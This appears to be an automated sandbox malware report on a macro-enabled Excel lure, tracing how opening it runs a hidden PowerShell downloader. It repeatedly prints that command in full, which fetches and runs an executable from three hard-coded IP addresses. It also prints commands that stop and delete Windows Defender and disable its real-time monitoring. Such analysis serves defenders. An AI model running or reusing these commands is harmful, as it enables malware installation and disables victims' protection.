Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 20_2_00E197C520_2_00E197C5
Document contains an embedded VBA macro which executes code when the document is opened / closedShow sources
Source: VBA code instrumentationOLE, VBA macro: Module \x042d\x0442\x0430\x041a\x043d\x0438\x0433\x0430, Function Workbook_OpenName: Workbook_Open
Document contains embedded VBA macrosShow sources
Source: Your_Order_Info_901027.xlsOLE indicator, VBA macros: true
Dropped file seen in connection with other malwareShow sources
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\tmp0251.exe 949C9C16BC08E6CC33D2A16B0B04BB3BE3CA753F63E556209E29B304C729C7CA
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe 949C9C16BC08E6CC33D2A16B0B04BB3BE3CA753F63E556209E29B304C729C7CA
Found potential string decryption / allocating functionsShow sources
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: String function: 0043B240 appears 7614 times
PE file has section (not .text) which is very likely to contain packed code (zlib compression ratio < 0.011)Show sources
Source: tmp0251.exe.7.drStatic PE information: Section: .data ZLIB complexity 0.999250687893
Source: tmp0261.exe.8.drStatic PE information: Section: .data ZLIB complexity 0.999250687893
Classification labelShow sources
Source: classification engineClassification label: mal100.expl.evad.winXLS@29/24@0/4
Contains functionality to adjust token privileges (e.g. debug / backup)Show sources
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 18_2_004BDDC5 GetStartupInfoW,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,GetTokenInformation,GetTokenInformation,GetLastError,GetTokenInformation,LookupAccountSidW,CreateProcessAsUserW,CloseHandle,AdjustTokenPrivileges,CloseHandle,18_2_004BDDC5
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 18_2_004C33DD GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,AdjustTokenPrivileges,CloseHandle,18_2_004C33DD
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 20_2_00E1DDC5 GetStartupInfoW,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,GetTokenInformation,GetTokenInformation,GetLastError,GetTokenInformation,LookupAccountSidW,CreateProcessAsUserW,CloseHandle,AdjustTokenPrivileges,CloseHandle,20_2_00E1DDC5
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 20_2_00E233DD GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,AdjustTokenPrivileges,CloseHandle,20_2_00E233DD
Contains functionality to enum processes or threadsShow sources
Source: C:\Users\user\AppData\Local\Temp\tmp0251.exeCode function: 8_2_002C2E3A CreateToolhelp32Snapshot,Process32NextW,8_2_002C2E3A
Contains functionality to instantiate COM classesShow sources
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 18_2_004BAD5E CoCreateInstance,wsprintfW,18_2_004BAD5E
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Application Data\Microsoft\FormsJump to behavior
Creates temporary filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\HERBBL~1\AppData\Local\Temp\CVR636C.tmpJump to behavior
Document contains an OLE Workbook stream indicating a Microsoft Excel fileShow sources
Source: Your_Order_Info_901027.xlsOLE indicator, Workbook stream: true
Executes batch filesShow sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe ''powershell.exe ''<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,''%tmp%\tmp0251.exe'');}catch{$beos1=0;}return $beos1;}$mmb1=@(''198.46.190.41/knot1.php'',''198.12.71.3/knot2.php'',''107.172.129.213/knot3.php'');foreach ($bifa in $mmb1){if(split-strings(''http://''+$bifa) -eq 1){break;} };<#validate component#>start-process ''%tmp%\tmp0251.exe'' -windowstyle hidden;'''| out-file -encoding ascii -filepath %tmp%\tmp6014.bat; start-process '%tmp%\tmp6014.bat' -windowstyle hidden'
Found command line outputShow sources
Source: C:\Windows\System32\cmd.exeConsole Write: ....................................`...............................A.p.p.D.a.t.a.\.L.o.c.a.5.....*.T.*......E.J....L.*.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................C.:.\.U.s.e.r.s.\.H.e.r.b. .B.l.a.c.k.b.u.r.n.\.D.o.c.u.m.e.n.t.s.>.........,.*.X.*.D.....*...dw..*.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................p.o.w.e.r.s.h.e.l.l...e.x.e.......................5.<..J.....bNw..\u`...X.*.`.*...*...............nwJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.............`...(.....................................5.<..J.....bNw....d.*..........E.J......*.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................................`...................................................@F.J......*...*......E.J......*.Jump to behavior
Source: C:\Windows\System32\sc.exeConsole Write: ..0....................w..0.....T...\...t...................................e.......4.........@.......0.................Jump to behavior
Source: C:\Windows\System32\sc.exeConsole Write: ....................[.S.C.]. .D.e.l.e.t.e.S.e.r.v.i.c.e. .S.U.C.C.E.S.S.....|.I.....Bqaw..\u3..w0...D...8....k\u..i.....Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........3.m....#........3.m....H...L|.m......ak '.m..ak..d.L|.mt............7.m.......mH...h.4............. '.m...m....Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|...#.....4........w...................w..0.....................................#...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|.../...h.4.H......w...................w..0...................................../...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|.../.....4........w...................w..0...................................../...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|...;...h.4.H......w...................w..0.................0...................;...........|...>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|...;.....4........w...................w..0.................K...................;...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|...G...A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.0.................s...................G..........."...>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|...G.....4........w...................w..0.....................................G...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|...S...h.4.H......w...................w..0.....................................S...........r...>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|...S.....4........w...................w..0.....................................S...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|..._...h.4.H......w...................w..0....................................._...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|..._.....4........w...................w..0....................................._...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|...k... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...<...................k...........2...>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|...k.....4........w...................w..0.................W...................k...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|...w...h.4.H......w...................w..0.....................................w...........l...>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|...w.....4........w...................w..0.....................................w...............>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|....... .4.H......w...................w..0.....................................................>..w........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............|.........4........w...................w..0.....................................................>..w........Jump to behavior
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe ''powershell.exe ''<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,''%tmp%\tmp0251.exe'');}catch{$beos1=0;}return $beos1;}$mmb1=@(''198.46.190.41/knot1.php'',''198.12.71.3/knot2.php'',''107.172.129.213/knot3.php'');foreach ($bifa in $mmb1){if(split-strings(''http://''+$bifa) -eq 1){break;} };<#validate component#>start-process ''%tmp%\tmp0251.exe'' -windowstyle hidden;'''| out-file -encoding ascii -filepath %tmp%\tmp6014.bat; start-process '%tmp%\tmp6014.bat' -windowstyle hidden'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe ''powershell.exe ''<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'');}catch{$beos1=0;}return $beos1;}$mmb1=@(''198.46.190.41/knot1.php'',''198.12.71.3/knot2.php'',''107.172.129.213/knot3.php'');foreach ($bifa in $mmb1){if(split-strings(''http://''+$bifa) -eq 1){break;} };<#validate component#>start-process ''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'' -windowstyle hidden;'''| out-file -encoding ascii -filepath C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat; start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat' -windowstyle hidden'
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat' '
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe '<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe');}catch{$beos1=0;}return $beos1;}$mmb1=@('198.46.190.41/knot1.php','198.12.71.3/knot2.php','107.172.129.213/knot3.php');foreach ($bifa in $mmb1){if(split-strings('http://'+$bifa) -eq 1){break;} };<#validate component#>start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe' -windowstyle hidden;
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\tmp0251.exe 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'
Source: unknownProcess created: C:\Windows\System32\cmd.exe /c sc stop WinDefend
Source: unknownProcess created: C:\Windows\System32\cmd.exe /c sc delete WinDefend
Source: unknownProcess created: C:\Windows\System32\sc.exe sc stop WinDefend
Source: unknownProcess created: C:\Windows\System32\sc.exe sc delete WinDefend
Source: unknownProcess created: C:\Windows\System32\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true
Source: unknownProcess created: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe
Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {667810C8-B7B6-4949-B963-0C62CADBB3B4} S-1-5-18:NT AUTHORITY\System:Service:
Source: unknownProcess created: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe 'C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe ''powershell.exe ''<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,''%tmp%\tmp0251.exe'');}catch{$beos1=0;}return $beos1;}$mmb1=@(''198.46.190.41/knot1.php'',''198.12.71.3/knot2.php'',''107.172.129.213/knot3.php'');foreach ($bifa in $mmb1){if(split-strings(''http://''+$bifa) -eq 1){break;} };<#validate component#>start-process ''%tmp%\tmp0251.exe'' -windowstyle hidden;'''| out-file -encoding ascii -filepath %tmp%\tmp6014.bat; start-process '%tmp%\tmp6014.bat' -windowstyle hidden'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe ''powershell.exe ''<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'');}catch{$beos1=0;}return $beos1;}$mmb1=@(''198.46.190.41/knot1.php'',''198.12.71.3/knot2.php'',''107.172.129.213/knot3.php'');foreach ($bifa in $mmb1){if(split-strings(''http://''+$bifa) -eq 1){break;} };<#validate component#>start-process ''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'' -windowstyle hidden;'''| out-file -encoding ascii -filepath C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat; start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat' -windowstyle hidden'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat' 'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe '<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe');}catch{$beos1=0;}return $beos1;}$mmb1=@('198.46.190.41/knot1.php','198.12.71.3/knot2.php','107.172.129.213/knot3.php');foreach ($bifa in $mmb1){if(split-strings('http://'+$bifa) -eq 1){break;} };<#validate component#>start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe' -windowstyle hidden;Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\tmp0251.exe 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp0251.exeProcess created: C:\Windows\System32\cmd.exe /c sc stop WinDefendJump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp0251.exeProcess created: C:\Windows\System32\cmd.exe /c sc delete WinDefendJump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp0251.exeProcess created: C:\Windows\System32\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $trueJump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp0251.exeProcess created: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WinDefendJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete WinDefendJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $trueJump to behavior
Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe 'C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe'
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcServer32Jump to behavior
Writes ini filesShow sources
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeFile written: C:\Users\user\AppData\Roaming\WinSocket\settings.ini
Executable creates window controls seldom found in malwareShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEWindow found: window name: SysTabControl32Jump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dllJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: C:\Windows\System.Management.Automation.pdb% source: powershell.exe, 00000011.00000002.2090250678.01826000.00000004.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2090250678.01826000.00000004.sdmp
Source: Binary string: System.Management.Automation.pdbAA:E source: powershell.exe, 00000011.00000002.2092848250.04DED000.00000004.sdmp
Source: Binary string: System.Management.Automation.pdbh source: powershell.exe, 00000011.00000002.2092848250.04DED000.00000004.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2090250678.01826000.00000004.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2090250678.01826000.00000004.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.2038600593.01B00000.00000002.sdmp, powershell.exe, 00000007.00000002.2085203122.03F10000.00000002.sdmp, powershell.exe, 00000011.00000002.2092552923.03EC0000.00000002.sdmp
Source: Binary string: indows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000011.00000002.2090250678.01826000.00000004.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2090250678.01826000.00000004.sdmp

Data Obfuscation:

barindex
Powershell starts a process from the temp directoryShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe ''powershell.exe ''<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'');}catch{$beos1=0;}return $beos1;}$mmb1=@(''198.46.190.41/knot1.php'',''198.12.71.3/knot2.php'',''107.172.129.213/knot3.php'');foreach ($bifa in $mmb1){if(split-strings(''http://''+$bifa) -eq 1){break;} };<#validate component#>start-process ''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'' -windowstyle hidden;'''| out-file -encoding ascii -filepath C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat; start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat' -windowstyle hidden'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe '<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe');}catch{$beos1=0;}return $beos1;}$mmb1=@('198.46.190.41/knot1.php','198.12.71.3/knot2.php','107.172.129.213/knot3.php');foreach ($bifa in $mmb1){if(split-strings('http://'+$bifa) -eq 1){break;} };<#validate component#>start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe' -windowstyle hidden;
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe ''powershell.exe ''<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'');}catch{$beos1=0;}return $beos1;}$mmb1=@(''198.46.190.41/knot1.php'',''198.12.71.3/knot2.php'',''107.172.129.213/knot3.php'');foreach ($bifa in $mmb1){if(split-strings(''http://''+$bifa) -eq 1){break;} };<#validate component#>start-process ''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'' -windowstyle hidden;'''| out-file -encoding ascii -filepath C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat; start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat' -windowstyle hidden'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe ''powershell.exe ''<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'');}catch{$beos1=0;}return $beos1;}$mmb1=@(''198.46.190.41/knot1.php'',''198.12.71.3/knot2.php'',''107.172.129.213/knot3.php'');foreach ($bifa in $mmb1){if(split-strings(''http://''+$bifa) -eq 1){break;} };<#validate component#>start-process ''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'' -windowstyle hidden;'''| out-file -encoding ascii -filepath C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat; start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat' -windowstyle hidden'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe '<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe');}catch{$beos1=0;}return $beos1;}$mmb1=@('198.46.190.41/knot1.php','198.12.71.3/knot2.php','107.172.129.213/knot3.php');foreach ($bifa in $mmb1){if(split-strings('http://'+$bifa) -eq 1){break;} };<#validate component#>start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe' -windowstyle hidden;Jump to behavior
Suspicious powershell command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe ''powershell.exe ''<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'');}catch{$beos1=0;}return $beos1;}$mmb1=@(''198.46.190.41/knot1.php'',''198.12.71.3/knot2.php'',''107.172.129.213/knot3.php'');foreach ($bifa in $mmb1){if(split-strings(''http://''+$bifa) -eq 1){break;} };<#validate component#>start-process ''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'' -windowstyle hidden;'''| out-file -encoding ascii -filepath C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat; start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat' -windowstyle hidden'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe '<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe');}catch{$beos1=0;}return $beos1;}$mmb1=@('198.46.190.41/knot1.php','198.12.71.3/knot2.php','107.172.129.213/knot3.php');foreach ($bifa in $mmb1){if(split-strings('http://'+$bifa) -eq 1){break;} };<#validate component#>start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe' -windowstyle hidden;
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe ''powershell.exe ''<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'');}catch{$beos1=0;}return $beos1;}$mmb1=@(''198.46.190.41/knot1.php'',''198.12.71.3/knot2.php'',''107.172.129.213/knot3.php'');foreach ($bifa in $mmb1){if(split-strings(''http://''+$bifa) -eq 1){break;} };<#validate component#>start-process ''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'' -windowstyle hidden;'''| out-file -encoding ascii -filepath C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat; start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat' -windowstyle hidden'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe ''powershell.exe ''<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'');}catch{$beos1=0;}return $beos1;}$mmb1=@(''198.46.190.41/knot1.php'',''198.12.71.3/knot2.php'',''107.172.129.213/knot3.php'');foreach ($bifa in $mmb1){if(split-strings(''http://''+$bifa) -eq 1){break;} };<#validate component#>start-process ''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'' -windowstyle hidden;'''| out-file -encoding ascii -filepath C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat; start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat' -windowstyle hidden'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe '<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe');}catch{$beos1=0;}return $beos1;}$mmb1=@('198.46.190.41/knot1.php','198.12.71.3/knot2.php','107.172.129.213/knot3.php');foreach ($bifa in $mmb1){if(split-strings('http://'+$bifa) -eq 1){break;} };<#validate component#>start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe' -windowstyle hidden;Jump to behavior
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 18_2_004BA298 LoadLibraryW,GetProcAddress,18_2_004BA298
PE file contains sections with non-standard namesShow sources
Source: tmp0251.exe.7.drStatic PE information: section name: .eh_fram
Source: tmp0261.exe.8.drStatic PE information: section name: .eh_fram
Uses code obfuscation techniques (call, push, ret)Show sources
